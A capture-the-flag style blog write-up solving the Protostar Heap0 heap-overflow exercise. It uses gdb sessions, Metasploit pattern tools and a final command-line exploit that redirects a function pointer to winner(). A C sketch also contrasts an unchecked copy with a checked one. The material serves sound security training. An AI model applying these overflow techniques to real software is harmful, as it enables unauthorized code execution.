Protostar Heap0 – Brushing up on Heap Exploitation

I haven't written about any binary exploitation in a while, so I decided to do a write-up for Protostar Heap0 on Exploit Exercises.

Protostar Heap0 - Introduction

I picked Heap0 in particular because I know that my heap skills are definitely lacking when compared to the stack. That, combined with LiveOverflow's Use-after-free tutorial for Heap2, pushed me towards working through these.

Program Analysis

To start, I downloaded the code from the challenge's page. I decided to perform everything locally, as I didn't want to worry about having to download and set up a VM for the time being.

Once I had the code on my machine, I compiled it and took a glance at its basic usage.

root@kali:~/Documents/exploit-exercises/protostar# gcc -o heap0 -fno-stack-protector -m32 heap0.c 
heap0.c: In function ‘main’:
heap0.c:32:9: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types]
   f->fp = nowinner;
         ^
root@kali:~/Documents/exploit-exercises/protostar# ./heap0 
data is at 0xe4e010, fp is at 0xe4e060
Segmentation fault
root@kali:~/Documents/exploit-exercises/protostar# ./heap0 'A'
data is at 0x9a2010, fp is at 0x9a2060
level has not been passed

Exploitation

Since name was only a 64 byte buffer, I wanted to see if a 100 character string would overflow it.

root@kali:~/Documents/exploit-exercises/protostar# gdb heap0 
GNU gdb (Debian 7.11.1-2) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from heap0...(no debugging symbols found)...done.
(gdb) r `python -c 'print "A" * 100'`
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A" * 100'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

As I expected, I was able to overwrite EIP with my A's. Next I created a pattern to find the appropriate offset for EIP.

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

< ... snip ... >

(gdb) r 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
Starting program: /root/Documents/exploit-exercises/protostar/heap0 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()

I then loaded my new EIP into pattern_offset and got an offset of 72 characters.

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -q 0x41346341 -l 100
[*] Exact match at offset 72

Once I verified that my offset of 72 was correct, I was able to overwrite EIP with my "BBBB" string.

(gdb) r `python -c 'print "A"*72 + "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A"*72 + "BBBB" + "C"*24'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

The only thing left for me to do was obtain the address for the "winner" function, which was as simple as running a print command.

(gdb) print winner
$1 = {<text variable, no debug info>} 0x804849b <winner>

With everything in place, I was able to write my full exploit and pass the level!

root@kali:~/Documents/exploit-exercises/protostar# ./heap0 `python -c 'print "A"*72 + "\x9b\x84\x04\x08"'`
data is at 0x8d59008, fp is at 0x8d59050
level passed
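
The offset of 72 matches the addresses gdb printed: 0x804b050 - 0x804b008 = 0x48, which is the 64-byte name buffer plus 8 bytes of allocator bookkeeping before the next chunk's data. The C sketch below is an added example, not the challenge source or code from the original post; it models the two chunks as one flat byte array and contrasts an unchecked copy with a length-checked one. The arena struct, the function names and the placeholder pointer value are assumptions made for illustration, and the unchecked copy is assumed to behave like strcpy.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_SIZE 64u            /* name buffer size stated in the write-up */
#define DATA_ADDR 0x804b008u     /* "data is at" from the gdb run */
#define FP_ADDR   0x804b050u     /* "fp is at" from the gdb run */
#define FP_OFFSET (FP_ADDR - DATA_ADDR)   /* 0x48 = 72 */
#define ORIGINAL_FP 0x11223344u  /* constructed placeholder, not a real address */

/* Constructed model: name at offset 0, pointer slot at FP_OFFSET. */
struct arena { unsigned char bytes[FP_OFFSET + sizeof(uint32_t)]; };

void arena_init(struct arena *a) {
    uint32_t fp = ORIGINAL_FP;
    memset(a->bytes, 0, sizeof a->bytes);
    memcpy(a->bytes + FP_OFFSET, &fp, sizeof fp);
}

/* Bytes between the end of name and the pointer slot. */
unsigned gap_bytes(void) { return FP_OFFSET - NAME_SIZE; }

/* Assumed strcpy-style copy with no length check (clamped to the model). */
void copy_unchecked(struct arena *a, const char *src) {
    size_t n = strlen(src) + 1;
    if (n > sizeof a->bytes) n = sizeof a->bytes;
    memcpy(a->bytes, src, n);
}

/* Hardened copy: reject input that does not fit name, terminator included. */
int copy_checked(struct arena *a, const char *src) {
    size_t n = strlen(src);
    if (n >= NAME_SIZE) return -1;
    memcpy(a->bytes, src, n + 1);
    return 0;
}

int fp_intact(const struct arena *a) {
    uint32_t fp;
    memcpy(&fp, a->bytes + FP_OFFSET, sizeof fp);
    return fp == ORIGINAL_FP;
}

int main(void) {
    struct arena a;
    char in[73];
    memset(in, 'A', 72); in[72] = '\0';   /* constructed 72-byte input */
    arena_init(&a); copy_unchecked(&a, in);
    printf("gap=%u unchecked intact=%d\n", gap_bytes(), fp_intact(&a));
    arena_init(&a);
    printf("checked rc=%d\n", copy_checked(&a, in));
    return 0;
}
```

In the model, 72 bytes of input are already enough to corrupt the pointer slot under the unchecked copy, because the terminating NUL lands on its first byte; the checked copy rejects anything of 64 bytes or more.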

Protostar Heap0 - Conclusion

While Protostar Heap0 was a simpler exercise, I'm hoping to continue working through the rest of the heap challenges.

doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.
